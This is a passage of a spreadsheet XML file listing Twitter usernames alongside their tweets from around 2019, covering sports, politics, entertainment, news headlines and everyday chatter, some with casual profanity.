    <t>When i saw this comment from @draconis1609 i probably read to much into it but i actually felt like my company was wanted at a convention someday XD was super happy x https://t.co/F21U88yMfr</t>
  </si>
  <si>
    <t>BridgettStith_</t>
  </si>
  <si>
    <t>I wonder if this bitch is gonna pull up when she gets in town 🤔</t>
  </si>
  <si>
    <t>Havenboatfish</t>
  </si>
  <si>
    <t>100 years old and still a cracking looking seaworthy boat . #sailing #fishing #Pembrokeshire #WestWales https://t.co/VBcQAtv2fz</t>
  </si>
  <si>
    <t>Atleticotweets</t>
  </si>
  <si>
    <t>Russian land of permafrost and mammoths is thawing https://t.co/hohKj8E0Vk</t>
  </si>
  <si>
    <t>YM_KingE_87</t>
  </si>
  <si>
    <t>Curious communication is the key to expansion. Educating yours... More for Virgo https://t.co/DhBw2aIkf7</t>
  </si>
  <si>
    <t>_wanderingsnow</t>
  </si>
  <si>
    <t>Moved to #HongKong about a month ago! 😮 #HongKongLiving #TravelBlog #HK #HKTravel #travelphotography https://t.co/GzbMoZvMYX</t>
  </si>
  <si>
    <t>AimeeCollierx</t>
  </si>
  <si>
    <t>@itv2 @LoveIsland @carolineflack1 @helenmoore96 wait for Lucy 😂😭</t>
  </si>
  <si>
    <t>Stealth_Patriot</t>
  </si>
  <si>
    <t>@Razorsmack1 @PatriotPennsy @Briteeye777 @familyfirstcorp @QmagaMike @mikeschaf @Cleanman0 @IQMatters4sure @okWessler5 @AsiaTaterTot @JohnWillmon6 @pumpernicklebe1 @RedDragonFly19 @RealWolf72 @JamesMtrev007 @KvMidd85_ @grannyanon1969 @JDHardin1 @Cdeeman123 @GagtheCFK Not a supporter of #TulsiGabbard but thankfully she put loud-mouth @SenKamalaHarris straight!! But #WillieBrown will do her in for her last transgressions.. for sure</t>
  </si>
  <si>
    <t>Andy261971</t>
  </si>
  <si>
    <t>@SInsandouts @romsey_squib @Nick_Veale1885 @kevmarmol @DerrickAllott @ChrisPen2530 @TheFalseLibero @DeppoInExile @targett_daniel @Mordwand @sotonians Up the fucking "ins"</t>
  </si>
  <si>
    <t>Danielle92_xo</t>
  </si>
  <si>
    <t>Hold on, I’m confused, did Richard die when he fell into the sea and Tami was just imagining he was still alive?? #Adrift @NetflixUK</t>
  </si>
  <si>
    <t>Pairsonnalites</t>
  </si>
  <si>
    <t>Stigmabase — Ad campaign seeks to sell Ireland as a 'foodie' destination: Titled 'Taste The Island', the TV, radio and print ads aim to get Irish people to make short trips to some of the many food and drink related experiences ... View article... https://t.co/X6ie1HAB9A</t>
  </si>
  <si>
    <t>✈ Hiring: Opportunities for Room Attenda #FlightAttendant #Sedona #crewlife ☑ Apply Now ☞ https://t.co/ekF8eBBJiJ https://t.co/UnWZJB28Q2</t>
  </si>
  <si>
    <t>JayDub179</t>
  </si>
  <si>
    <t>@TherealMsL0ndon 🎂🎂🎂🎂🎂🍑🍑🍑🍑🍑 for day's!</t>
  </si>
  <si>
    <t>sundevil0224</t>
  </si>
  <si>
    <t>@mitchellvii @RightHookUSA Galaxy Quest. Tim Allen would be proud. I support ya but stop the crap about how much you know. It’s just self promoting claptrap until something actually comes of it. Knowing of the criminality and deceit of the Deep State is meaningless until they are actually in jail.</t>
  </si>
  <si>
    <t>davidjwbailey</t>
  </si>
  <si>
    <t>@CCHQPress @BorisJohnson @MoS_Politics What evidence is this nonsense based on? . . . None. What you propose has never worked, does not work, and will not work. It’s an appeal to base at their own expense. Literally. #NotMyPM</t>
  </si>
  <si>
    <t>haaleybouch</t>
  </si>
  <si>
    <t>I cried at the bar the other day cause there were no mozzarella sticks</t>
  </si>
  <si>
    <t>ChrisPanhead</t>
  </si>
  <si>
    <t>@SuzyLuGME are you ready for @slipknot new album next Friday?!!!🤘🤘🤘</t>
  </si>
  <si>
    <t>BlkAngelT</t>
  </si>
  <si>
    <t>And divided we fall! I'm real curious to know what has he done to help "the community" he keeps talking about? https://t.co/0LE8Hq6Wsf</t>
  </si>
  <si>
    <t>IchikaKaneki_</t>
  </si>
  <si>
    <t>one person followed me and one person unfollowed me // automatically checked by https://t.co/pBjC50BIsY</t>
  </si>
  <si>
    <t>Hail_Blue</t>
  </si>
  <si>
    <t>@ItsAntWright The same national media that claims Michigan is irrelevant. If they are so irrelevant then stop talking about them.</t>
  </si>
  <si>
    <t>Cassasue</t>
  </si>
  <si>
    <t>@timjacobwise No one is angry about immigration. Stop mis representing this issue. Americans want immigrants to follow a legal process. Period. Thank you</t>
  </si>
  <si>
    <t>StockBoardAsset</t>
  </si>
  <si>
    <t>07 Aug - 08:15:48 AM [RTRS] (USv1 US7YT=RR) - U.S. TREASURY YIELDS FALL TO SESSION LOWS IN EARLY U.S. TRADING, IN STEP WITH RECORD LOW GERMAN YIELDS</t>
  </si>
  <si>
    <t>nodurheadtothis</t>
  </si>
  <si>
    <t>@krisxmoon I’m so so sorry. I live only an hour away (if you’re talking about Dayton) but I’ve only been a handful of times. I really hope all of your friends and family are safe and sound. It was heartbreaking waking up and seeing that on the news. I’m wishing you all the best.</t>
  </si>
  <si>
    <t>et_galang</t>
  </si>
  <si>
    <t>Korea vs Hungary in the Sabre world men's finals. Such intensity.</t>
  </si>
  <si>
    <t>GdnPolitics</t>
  </si>
  <si>
    <t>John McDonnell has offered the SNP more than necessary on independence | Jonathan Freedland https://t.co/oL1z8ARwas</t>
  </si>
  <si>
    <t>SeanWise1892</t>
  </si>
  <si>
    <t>Bloody good start in the cricket #TheAshes https://t.co/fF0CLgrLtT</t>
  </si>
  <si>
    <t>briigieboo</t>
  </si>
  <si>
    <t>@reganxleighx I’m happy for you guys!!!</t>
  </si>
  <si>
    <t>abneyalina</t>
  </si>
  <si>
    <t>Download PDF 2019 Diary Planner: Page A Day (365 Pages) Daily Diary / Planner, Calendar Schedule Organizer for Daily, Weekly &amp; Monthly Goals (2019 diary day per page) Floral Roses Cover &gt;&gt; https://t.co/bnnUkDxEqe</t>
  </si>
  <si>
    <t>niasymone_xo</t>
  </si>
  <si>
    <t>You may yearn to charge ahead today, but taking everything one... More for Capricorn https://t.co/JJyz0OqX1I</t>
  </si>
  <si>
    <t>bossbitchshawna</t>
  </si>
  <si>
    <t>Your inspired approach turns a bland project into something vi... More for Leo https://t.co/SzwUGYWzIE</t>
  </si>
  <si>
    <t>CNNPropaganda</t>
  </si>
  <si>
    <t>Satanists to Rally for More Abortions in Pro-Trump State https://t.co/Ycpl8RjMha via @gatewaypundit</t>
  </si>
  <si>
    <t>headlesseyesleo</t>
  </si>
  <si>
    <t>the guy died. u weren't quick enough</t>
  </si>
  <si>
    <t>StephKHOU</t>
  </si>
  <si>
    <t>@Stallion2011 Ha! You’re the third person...opposite in photos people! 😂🙈</t>
  </si>
  <si>
    <t>60mmk</t>
  </si>
  <si>
    <t>One of our handleless door styles in the colour Concrete which comes in light or dark. https://t.co/5wOur0hFzn</t>
  </si>
  <si>
    <t>SUSDMusic</t>
  </si>
  <si>
    <t>first day of school tomorrow! looking forward to seeing our students again and kicking off the 2019-2020 school year! #backtoschool #BackToSchool2019 #readyornot #onward https://t.co/K4M36UTQuL</t>
  </si>
  <si>
    <t>AskCapitalOne</t>
  </si>
  <si>
    <t>@Patrici72700338 We completely understand, Patricia. Can you send us a DM w/ a screenshot of the issue you're running into so we can help?^JD</t>
  </si>
  <si>
    <t>BabyXiknow</t>
  </si>
  <si>
    <t>@KingBinkSantana I have a few! So lucky and blessed that I do have more than one! @WaveSinatra @MartinWhiteJr1 @boomtadowtoo @TameraKirkwood @Odessey99 @VexingVixxen</t>
  </si>
  <si>
    <t>ChrisSalts</t>
  </si>
  <si>
    <t>@MathBomb Wait till the screen.</t>
  </si>
  <si>
    <t>Merrrrrrrrp</t>
  </si>
  <si>
    <t>@tatsumaxspace Chicken is amazing especially when it's just right and not dry af</t>
  </si>
  <si>
    <t>lindaleep</t>
  </si>
  <si>
    <t>When are people going to realize the MAIN STREAM MEDIA is fanning the flames of hatred and racism.</t>
  </si>
  <si>
    <t>OnScenesTv</t>
  </si>
  <si>
    <t>Click Link In Bio To Shop | https://t.co/mTXoBwu5dz</t>
  </si>
  <si>
    <t>miloucomehome</t>
  </si>
  <si>
    <t>@onkeikun (I feel he mentioned his favourite song from the series at one point?)</t>
  </si>
  <si>
    <t>PelicanBrewCo</t>
  </si>
  <si>
    <t>Come party with us on the beach! The Cape Kiwanda Longboard Classic &amp; Brewfest is a wet n' wild weekend of surfing n' suds on the sand in Pacific City! https://t.co/Ua2dr5pBp8</t>
  </si>
  <si>
    <t>ChelseaValky</t>
  </si>
  <si>
    <t>@evilbluebird And also.... Leicester were excellent! One of those teams that can sell their best players and still find decent replacements.</t>
  </si>
  <si>
    <t>Adrenahn</t>
  </si>
  <si>
    <t>@QueenVelvet4 Architects clearly came up with "f-ck you, pay me" first!</t>
  </si>
  <si>
    <t>901JazzPlaylist</t>
  </si>
  <si>
    <t>Now Playing: Brian Hughes; Yulara - Flyin' High off of the album "" on Jazz90.1 @901jazz</t>
  </si>
  <si>
    <t>ed_parke</t>
  </si>
  <si>
    <t>@FlannyMLB @MLB Don’t think Nicky is going to be able to hit enough to be in the majors long.</t>
  </si>
  <si>
    <t>lambrghinimursz</t>
  </si>
  <si>
    <t>It’s 6:21 am and I am craving Wendy’s</t>
  </si>
  <si>
    <t>MajorDLove1</t>
  </si>
  <si>
    <t>@CoachJohnnyi This is my new College DVSU stands for Death Valley State university Dingos. For a question is this yellow flag where's is The flag???? my players is 22 overall and USC is 99 overall I know this will be our lost 😢😢😢😢😢 https://t.co/ZaXdGUAH7U</t>
  </si>
  <si>
    <t>Survivor_Lex2</t>
  </si>
  <si>
    <t>@SandOverload "Always happy to see you Geras"</t>
  </si>
  <si>
    <t>1escodash</t>
  </si>
  <si>
    <t>Mfs really in the way</t>
  </si>
  <si>
    <t>JayyAbundis</t>
  </si>
  <si>
    <t>I bought a cute ass jumpsuit, and I wanna go on a date now 🥴</t>
  </si>
  <si>
    <t>Jeffreychin</t>
  </si>
  <si>
    <t>@senatemajldr Traitor, please. STFU and stay in your shell. You've done enough damage already. #MoscowMitch, formerly known as #CocaineMitch #MoscowMitchMcTraitor</t>
  </si>
  <si>
    <t>Young_Justo</t>
  </si>
  <si>
    <t>Another friday and no new @playboicarti 😪</t>
  </si>
  <si>
    <t>GALLERYCUBED</t>
  </si>
  <si>
    <t>Born and raised in China, Xinan Ran (Helen) lives in Brooklyn, New York. Her work deals with themes of Exodus and the uncertainty it carries. She is one of GALLERY CUBED’S Network of Extraordinary Artists 🚀🚀🚀Application for the current NEA Open Call … https://t.co/5IwI2V4HUY https://t.co/xgIFiXHw3b</t>
  </si>
  <si>
    <t>Haveairgardena</t>
  </si>
  <si>
    <t>If the love is real then the love will fight.</t>
  </si>
  <si>
    <t>landslug</t>
  </si>
  <si>
    <t>@Freedomforalwa1 @moneytrails @toddstarnes @jihadwatchRS @realDonaldTrump A $65mil book deal, speaking engagements, and a Netflix deal might have something to do with it. Derp</t>
  </si>
  <si>
    <t>BlueBagRecords</t>
  </si>
  <si>
    <t>Top o’ the speaker status this weekend is awarded to Big Bird. Fly on... #recordshop #recordstore #vinyl #records #boston #cambridge #cambridgema https://t.co/JacG0WTg52</t>
  </si>
  <si>
    <t>ElleInTheUK</t>
  </si>
  <si>
    <t>@MaisonGladys If only we could power the country with bullshit</t>
  </si>
  <si>
    <t>robertgreen500</t>
  </si>
  <si>
    <t>Any chance we can trade Devo to the Dodgers for the next Yordan Alvarez?</t>
  </si>
  <si>
    <t>RobSmyth</t>
  </si>
  <si>
    <t>@HMRCVictim @Conservatives @BorisJohnson @JamesCleverly And we know of many many more who have not made their support public, yet. I would guess that in truth we have way over half of the HoC as well as a large number of HoL supporting a review or scrapping altogether.</t>
  </si>
  <si>
    <t>Amberryonko</t>
  </si>
  <si>
    <t>I’m too good to be treated like shit 😂 especially now that I’m having a baby . I can’t let him see that bull shit 🤦🏻‍♀️</t>
  </si>
  <si>
    <t>NCHumaneSociety</t>
  </si>
  <si>
    <t>I got to spend some time with this wonderful girl on Friday. She cuddled up to me and gave me sweet kisses. Graham is a wonderful girl that loves attention and needs to be in a home as an only pet. Please consider adopting or fostering today! https://t.co/rAEsjRpbyD</t>
  </si>
  <si>
    <t>MalArt114</t>
  </si>
  <si>
    <t>Did some drawpile with some friends today one of them was @InvalidBot , found some monstrosities came out of the session 😂 it was a lot of fun!! https://t.co/p9KiEX4x0e</t>
  </si>
  <si>
    <t>levinmaya002</t>
  </si>
  <si>
    <t>#toronto #ontario shonieman_the_king @ Ripley's Aquarium of Canada https://t.co/GRupM8syXS</t>
  </si>
  <si>
    <t>Kenny__Stewart</t>
  </si>
  <si>
    <t>@KennyFarq @wornoutmumhack I like the way you shoe-horned that in.</t>
  </si>
  <si>
    <t>bonkerseh</t>
  </si>
  <si>
    <t>@EddyJokovich And no Wayne Swan to save us. Maybe Josh could try to get him on board with some helpful suggestions. Heck even I have already thought of a few. Not too late ? Hell.</t>
  </si>
  <si>
    <t>simonearvin1</t>
  </si>
  <si>
    <t>@ValaAfshar I am so glad and not surprised at all, you are obviously your father’s son. Strong parents!</t>
  </si>
  <si>
    <t>JoeJohnSr</t>
  </si>
  <si>
    <t>@Ben_Baby not to mention that their ISD administrators had no explanation why they made the choice they did, nonetheless it’s time to move forward. 🙌🏽</t>
  </si>
  <si>
    <t>joeyrix</t>
  </si>
  <si>
    <t>@kynmartin @GJM724 Seriously! I have so many questions seeing the results of this. Maybe because there are very few sandwiches, if any, I won’t eat. https://t.co/mxjW1HJaK3</t>
  </si>
  <si>
    <t>EveBerzas</t>
  </si>
  <si>
    <t>@leash0202 How about working from home? Starting pay is $15 an hour. https://t.co/cHc3Zp3ZPJ I’ve done this for years and I do not regret it at all.</t>
  </si>
  <si>
    <t>mshuster09</t>
  </si>
  <si>
    <t>@buddy_ferrara Steve when Lorin doesn’t want to hang out anymore 😂 https://t.co/Td3RvnNLXR</t>
  </si>
  <si>
    <t>annaobriendvm</t>
  </si>
  <si>
    <t>Guess who signed up for a drawing class this fall semester!!!! https://t.co/Nn5MyFzvDe</t>
  </si>
  <si>
    <t>AILiveStream</t>
  </si>
  <si>
    <t>@LaughsInBritish @cutieikigai My point is you're getting mad for the wrong reasons. We are mad because our futures are in great danger when it comes to health care, employment, economy and relationships with other nations. You seem to be mad that your TV license is no longer free.</t>
  </si>
  <si>
    <t>warringtonworld</t>
  </si>
  <si>
    <t>Vandals blamed for play area blaze https://t.co/AwRS32L0ND https://t.co/BvWdEZIwDo</t>
  </si>
  <si>
    <t>HarperArthurM</t>
  </si>
  <si>
    <t>@Redclaw38812660 Totally. The best way to learn is from mistakes.</t>
  </si>
  <si>
    <t>marabutler67</t>
  </si>
  <si>
    <t>To start the day: Congress denies Trump on pulling $$ back from foreign countries. They are afraid to hurt their "ally's" feelings. Tell me how a So. American country will be able to help the U.S. in the event of war?? Citizens are against giving $ to countries sending their</t>
  </si>
  <si>
    <t>AshleyEditorial</t>
  </si>
  <si>
    <t>@DesideriaMesa @tamingtheriver @writingiswar @AlexPanaWriter @MJChance3 @jaylynnwatkins1 @abbythetweet @WriteOrDieNow @BlossomMist @joepaulk @IanMBroderick @everywriter @RealJMcDonough @InevitableCJ @micah_chaim @MsMoxieMalone @lilydawn526 Raining here, too. I’m working on my second book while I have a break. I turned in my second round of edits to the author this morning.</t>
  </si>
  <si>
    <t>chezmichel7</t>
  </si>
  <si>
    <t>Harvard psychiatrist talks book ‘The Dangerous Case of Donald Trump’ https://t.co/trjDB6qgDw</t>
  </si>
  <si>
    <t>DarrellPelleti1</t>
  </si>
  <si>
    <t>@DC_CHILLIN_8 DC knows what’s up.</t>
  </si>
  <si>
    <t>mickster</t>
  </si>
  <si>
    <t>The #Matrix4 is happening with #KeanuReeves and #CarrieAnneMoss ... https://t.co/Ir365hpjXw https://t.co/bORGzfLm98</t>
  </si>
  <si>
    <t>lgilski</t>
  </si>
  <si>
    <t>@Drake Care Package got me back in 2011 and I’m feeling it</t>
  </si>
  <si>
    <t>LawLegalHistory</t>
  </si>
  <si>
    <t>Survey of 11 jurisdictions on the legislative and policy frameworks affecting the protection of sacred places of indigenous peoples, their graves, remains, related artifacts, and indigenous cultural property generally via Law Librarians of Congress - https://t.co/LRnqsDtnoQ</t>
  </si>
  <si>
    <t>charlotteellisl</t>
  </si>
  <si>
    <t>Also they made me an assistant for a graduate level class despite me being a brand new graduate student not to mention said class meets at the same time I have my own class. Make it make sense please</t>
  </si>
  <si>
    <t>PageSix</t>
  </si>
  <si>
    <t>Wendy Williams is still hitting the town despite dropped tour dates https://t.co/F5KTeSgtqi https://t.co/LswaISbJeJ</t>
  </si>
  <si>
    <t>DtooPodcast</t>
  </si>
  <si>
    <t>Waking up at 6am then realizing you don’t have work today #IsMoreSatisfyingThanSex https://t.co/edTwcdxxvi</t>
  </si>
  <si>
    <t>Fight_Expert</t>
  </si>
  <si>
    <t>@aaronbronsteter Not the same but a bit similar w/ Colby vs Robbie where you are mentally out of the fight and being overwhelmed w/ punches. Mental game is a big part of it.</t>
  </si>
  <si>
    <t>PaggiSZN</t>
  </si>
  <si>
    <t>@ResettYT im doing that i woke up at like 2am</t>
  </si>
  <si>
    <t>ThomasBizzle2</t>
  </si>
  <si>
    <t>@AmyiCzyk Czyk that off the list. https://t.co/KtvOKmDJcG</t>
  </si>
  <si>
    <t>AstrosFansUK</t>
  </si>
  <si>
    <t>Who knew, all we needed to shut down Albert Pujols vs the Astros was pitch Framber Valdez... #Astros</t>
  </si>
  <si>
    <t>MichiganChat</t>
  </si>
  <si>
    <t>Going to go position by position on teams that always have a great player at _____ position: Thread 💥</t>
  </si>
  <si>
    <t>AliceInWL0_</t>
  </si>
  <si>
    <t>I'd do one of those which colours do I remind you of or what type of energy I give off but no one actually follows this account for my tweets so no one could answer</t>
  </si>
  <si>
    <t>redleoparddd</t>
  </si>
  <si>
    <t>@ProfessorDaxter Yeah games are totally to blame 😂 definitely playing journey or the last guardian makes me wanna blow mother fuckers away 😂 bit of house flipper as well lmao They're dumb. Being a fucking psycho makes people wanna shoot people 😂</t>
  </si>
  <si>
    <t>LxquoriceBxtch</t>
  </si>
  <si>
    <t>@ivyanthony95 That 5th Harmony girl Naomi been trying to give us a Ciara tea and it’s just not working. I’d rather have the real thing.</t>
  </si>
  <si>
    <t>FootyNewsMedia</t>
  </si>
  <si>
    <t>⚽️ #Football 💥 #Boxing 🥊 #Sport 🎾🏏⛳️ Facebook/Twitter/Instagram - Search SportNewsMedia and BoxingNewsMedia also BrummieBigGuy 💥 (Twitter Only - Search FootyNewsMedia) ⚡️</t>
  </si>
  <si>
    <t>Clink67227526</t>
  </si>
  <si>
    <t>@TheSarahKey What the fuck</t>
  </si>
  <si>
    <t>TweedStokes</t>
  </si>
  <si>
    <t>@Helen_V100 @Channel4News Where do you get this from? Brexit Party and Conservatives are now both hard brexit parties and are on around 45% in recent polls. You make it up as you go along.</t>
  </si>
  <si>
    <t>ColeKamil</t>
  </si>
  <si>
    <t>@MideNaike Can’t even pull himsel out the pool 😂😂😂😂</t>
  </si>
  <si>
    <t>DanielS_555</t>
  </si>
  <si>
    <t>@MLS_Buzz What does the winner of the US Open Cup get?</t>
  </si>
  <si>
    <t>pikeitup1738</t>
  </si>
  <si>
    <t>@teeayecee @marleecastillo Yep, you just have to scan them. It’s pretty quick.</t>
  </si>
  <si>
    <t>sweetspot42</t>
  </si>
  <si>
    <t>@samstein @lachlan The media will give him free coverage for ratings</t>
  </si>
  <si>
    <t>xrobiie</t>
  </si>
  <si>
    <t>And now Cordy becomes part Demon to survive the visions. #Angel 3x11</t>
  </si>
  <si>
    <t>lesliexitlali</t>
  </si>
  <si>
    <t>one person followed me and one person unfollowed me // automatically checked by https://t.co/uCabpwPA52</t>
  </si>
  <si>
    <t>jpears86</t>
  </si>
  <si>
    <t>@EtJema @fumfumfum3 don’t give up guys, tweet Lang ng tweet. #PBB8TandemFUMIYAM #PBB8FunniestBATCH2</t>
  </si>
  <si>
    <t>CmdrRheeney</t>
  </si>
  <si>
    <t>Always love filming a combat outing with #theBuurPit CMDR's .... especially when there are so many different trail and weapon colours - makes for quite a light show! 😉🌈🚀⭐ @EliteDangerous @TheBenedetti #scrapingthesky https://t.co/4DM0CoDR7D</t>
  </si>
  <si>
    <t>philhester</t>
  </si>
  <si>
    <t>@KyleHotz I will eff them up soon enough! Thanks, though.</t>
  </si>
  <si>
    <t>yaboynyp</t>
  </si>
  <si>
    <t>Smooth pull up by Pickett. Alexander and Marko playing together on the court</t>
  </si>
  <si>
    <t>pltxcps</t>
  </si>
  <si>
    <t>‘Praying For Our City’: Philadelphia Athletes, Sports Teams Sending Support To Philadelphia Police Department Following Shooting – CBS Philly https://t.co/h92RW0Eo8o</t>
  </si>
  <si>
    <t>EmceeColumns</t>
  </si>
  <si>
    <t>@tonyposnanski I love this guy because everyone basically stands around and stares as he just relentlessly dunks on himself</t>
  </si>
  <si>
    <t>auminer</t>
  </si>
  <si>
    <t>@_leebret Cool it! You are taking things I haven't said and making an issue of it. Deal with that. Enough.</t>
  </si>
  <si>
    <t>STOPObesity</t>
  </si>
  <si>
    <t>Thank you @AANP_NEWS for being a Champion of #NOCW2019 If you want to become a Champion of National Obesity Care Week click here: https://t.co/pv7W0PrGdx https://t.co/yniUHRQHkS</t>
  </si>
  <si>
    <t>ftvictoriafern</t>
  </si>
  <si>
    <t>@MetisJim @IndigenousXca We are registeted in the HBC archives in Manitoba. Our family originated in the Red River in the 1820s and have several Red River ancestors in our lineage. Cardinals, Bastien, Mainville, Ross, Jourdain, Bruyere, Brabant, Lucier, Ogden, Alexander etc.</t>
  </si>
  <si>
    <t>jolloyd19</t>
  </si>
  <si>
    <t>@NHSResolution How many more women must be also damaged for life before you say sorry and act to stop another generation of women being harmed? Australia have apologised - why can’t the UK? @NHSResolution @IMMDSReview Too many if us suffering the same harm to be a coincidence #slingthemesh</t>
  </si>
  <si>
    <t>NDKush</t>
  </si>
  <si>
    <t>@cleonardich @ezridersos Not having the mental capacity to clean a sidewalk is what led to the sidewalks needing to be cleaned in the first place.</t>
  </si>
  <si>
    <t>manuelrendo12</t>
  </si>
  <si>
    <t>@espn @kpelton Whoever made this literally just wanted to form entertaining playoff matches, he did not use any logic. Look at the Matchups. Westbrook v. Blazers again, Sixers v. Butler, Kawhi v. Warriors, Kyrie v. Bucks, etc. Y’all gotta hire new people @espn</t>
  </si>
  <si>
    <t>realtegan</t>
  </si>
  <si>
    <t>Whew. The outage appears to have only lasted until 7:01. I might still be able to catch the stream. Unless it goes out again. Which is might, because THE STUPID PROBLEM HASN'T BEEN FIXED despite what ignorant Centurylink reps might say.</t>
  </si>
  <si>
    <t>ecossexrp1</t>
  </si>
  <si>
    <t>@EDadoun @telcoin_team Have a look into it mate, growing arms and legs partnering with phone companies.</t>
  </si>
  <si>
    <t>Stoical_Cat</t>
  </si>
  <si>
    <t>@bentbacktulips Can I order one for delivery please?!</t>
  </si>
  <si>
    <t>dwj66</t>
  </si>
  <si>
    <t>@pantsdanny I miss the dancer</t>
  </si>
  <si>
    <t>jessethehett</t>
  </si>
  <si>
    <t>Patrick Crusius and Connor Betts are CANCELLED</t>
  </si>
  <si>
    <t>seanmohen</t>
  </si>
  <si>
    <t>Conversely, if Paxton, Happ, and Tanaka pitched home games in Chavez Ravine, one or more might have an ERA under 4 #NYYvsLAD</t>
  </si>
  <si>
    <t>blazinsb3</t>
  </si>
  <si>
    <t>Finally got to see my bae today I haven’t seen her in weeks and I missed her so much. I’m a get her back soon I’m just waiting on them to install the thermostat and then she’s all mine again!</t>
  </si>
  <si>
    <t>TapRoomCraig</t>
  </si>
  <si>
    <t>@JerryLouLooper1 @fromthebacktees @tuckerdalebooth You and me Jerry !</t>
  </si>
  <si>
    <t>thegeorgiamoon</t>
  </si>
  <si>
    <t>@stellaviatorem Glad I'm not alone in this! 😂 I *am* organized...in that *I* know where everything in my room is, but to the outside observer I am messy af!! But that's just how I best structure my life.</t>
  </si>
  <si>
    <t>MattF_NorCal</t>
  </si>
  <si>
    <t>Bell St: Apartment fire has been knocked down; primary search in fire apartment and upstairs exposure is all clear.</t>
  </si>
  <si>
    <t>jessicaf4599</t>
  </si>
  <si>
    <t>I just entered to #win a #Step2 Up &amp; Down Roller Coaster for this week's #FanFriday #Giveaway! https://t.co/lBZlek0FNy /</t>
  </si>
  <si>
    <t>SlgDraco</t>
  </si>
  <si>
    <t>Anybody wanna be friends? I need new ppl to ft</t>
  </si>
  <si>
    <t>eswright18</t>
  </si>
  <si>
    <t>#Win an #Amazon Gift Card in our #Wattpad, #Radish and #ShortStory #Sweepstakes #Giveaway via @sffbookbonanza: https://t.co/982bxfa7y2</t>
  </si>
  <si>
    <t>IAmGodivah</t>
  </si>
  <si>
    <t>@theyluv_nia I want too what’s the dates ?</t>
  </si>
  <si>
    <t>edward_opoku</t>
  </si>
  <si>
    <t>One more year added!! Thanks for the birthday wishes! 💕 #BeHappy https://t.co/E8Pq5GWrEe</t>
  </si>
  <si>
    <t>vorrell</t>
  </si>
  <si>
    <t>@IvankaTrump Stop demonizing mental illness. Sufferers are much more likely to be victims than perpetrators of crime. Kind of like immigrants but that’s another story. Face it. Your country has an out of control gun violence problem and most other developed countries don’t. Why?</t>
  </si>
  <si>
    <t>gstring</t>
  </si>
  <si>
    <t>@Keri_Adams I feel like that dog went to a rave it wasn't invited to.....</t>
  </si>
  <si>
    <t>oBriteLite</t>
  </si>
  <si>
    <t>@StollyCOD Everyone thought he was gonna be absolute dogshit so him not throwing a pick makes him the next big thing?</t>
  </si>
  <si>
    <t>desniikura</t>
  </si>
  <si>
    <t>@BellSchmid Is this the infestation 45 was talking about? https://t.co/2TDcX7dS5Q</t>
  </si>
  <si>
    <t>JulietGordon04</t>
  </si>
  <si>
    <t>No offence but getting over 6s for every subject for my gcse results tomorrow would suck #gcseresultsday2019</t>
  </si>
  <si>
    <t>bonnieonpaper</t>
  </si>
  <si>
    <t>@mschlapp 🤔UM...If this is a widespread problem across society (divorce, fatherless children, etc.) how is it we don’t see more diversity and inclusion in the demographic makeup of these shooters? #AFAF</t>
  </si>
  <si>
    <t>generativist</t>
  </si>
  <si>
    <t>@alexpmil @CatherineW_A Oh wow, I hadn’t heard about the postcard thing. It’s...sorta brilliant marketing.</t>
  </si>
  <si>
    <t>lessthanjb</t>
  </si>
  <si>
    <t>@XFLDefenders excited to be a Defender in Wisconsin!</t>
  </si>
  <si>
    <t>Jeaniepittman71</t>
  </si>
  <si>
    <t>This is the Norm w/ #democrats when things are done by the book, but it doesn't go in their favor, they Blow UP, they want to change the rules/laws just to get their way! They Bully,Theaten, get Hostile&amp;Violent to get their way! #LiberalismIsTerrorism https://t.co/YOprmlOA6s</t>
  </si>
  <si>
    <t>isamoriaa</t>
  </si>
  <si>
    <t>I won’t kiss and tell 💚🥵</t>
  </si>
  <si>
    <t>TheXavr</t>
  </si>
  <si>
    <t>today was beast and will not forget ☀️ 🌛</t>
  </si>
  <si>
    <t>PhilHeron</t>
  </si>
  <si>
    <t>Good Morning! Here's your Daily Times for Saturday, August 31: Slinky makes history in Clifton Heights https://t.co/wldgQGNb4o via @delcotimes</t>
  </si>
  <si>
    <t>KariscoRadio</t>
  </si>
  <si>
    <t>NowPlaying break up with your girlfriend, iandapos;m bored - Ariana Grande https://t.co/kxGEZPwF68 08:10</t>
  </si>
  <si>
    <t>ACMVora</t>
  </si>
  <si>
    <t>One lanyard to rule them all in Canberra: Single pass mooted for intelligence agencies https://t.co/8StIJIlJGv via @canberratimes https://t.co/k13Ig7bCL9</t>
  </si>
  <si>
    <t>kderong</t>
  </si>
  <si>
    <t>@awillis He needs two walks a day and barks at squirrels all day. But he’s a sweetheart, and he’s keeping us active.</t>
  </si>
  <si>
    <t>BitcoinMotorist</t>
  </si>
  <si>
    <t>@BrettRSmith76 @reason The point of the article is that these traffic stops are not about public safety, they are a pretense to catch drug users and dealers and they are a source of revenue. I would rather someone drive with a broken tail light than have the road hazard of a stop and scuffle.</t>
  </si>
  <si>
    <t>gem_wilko</t>
  </si>
  <si>
    <t>@broganpaget @bethmasonn @DoofySwansea this reminds me of you when I sent you to get me some when we were on holiday</t>
  </si>
  <si>
    <t>eastsideinz</t>
  </si>
  <si>
    <t>You know something, we never hear from the families/friends of these shooters. I wonder what they got to say about it. Esp the ones who clearly have supremacist mindsets. Did the parents teach them that and it just went too far... Like I want more details</t>
  </si>
  <si>
    <t>eightiesmitch</t>
  </si>
  <si>
    <t>@joeyslipbite you think superfruit will let us be future friends one day and come back 🤕</t>
  </si>
  <si>
    <t>somuchfun247</t>
  </si>
  <si>
    <t>seeing an artist perform live gives you a different appreciation for their music</t>
  </si>
  <si>
    <t>alastair_esq</t>
  </si>
  <si>
    <t>@andrewjameikle @TheSimonC90 I'm a whore for the weekend</t>
  </si>
  <si>
    <t>KNCY1600AM</t>
  </si>
  <si>
    <t>Officials with the U.S. Army Corps of Engineers' Kansas City District say there is a simple way for lake visitors to greatly reduce their risk of drowning this Labor Day weekend: Wear a life jacket. https://t.co/Xj7MUYkqdI</t>
  </si>
  <si>
    <t>Breslaybabe</t>
  </si>
  <si>
    <t>@TheeGod_Father Sounds entertaining to me lol</t>
  </si>
  <si>
    <t>HunterWotruba</t>
  </si>
  <si>
    <t>@omarelgzy Yeah imagine thinking celebrating the death of a POS was the same as actually killing people</t>
  </si>
  <si>
    <t>Rayburn02703</t>
  </si>
  <si>
    <t>Suspensions have showed up.</t>
  </si>
  <si>
    <t>FLOORPUNCHED</t>
  </si>
  <si>
    <t>@ChrisIsHCFest @ITSFASTRONALD my nana took me to the circus a lot when i was a child and now i'm in therapy</t>
  </si>
  <si>
    <t>SmurFysLife</t>
  </si>
  <si>
    <t>FMAB the goat</t>
  </si>
  <si>
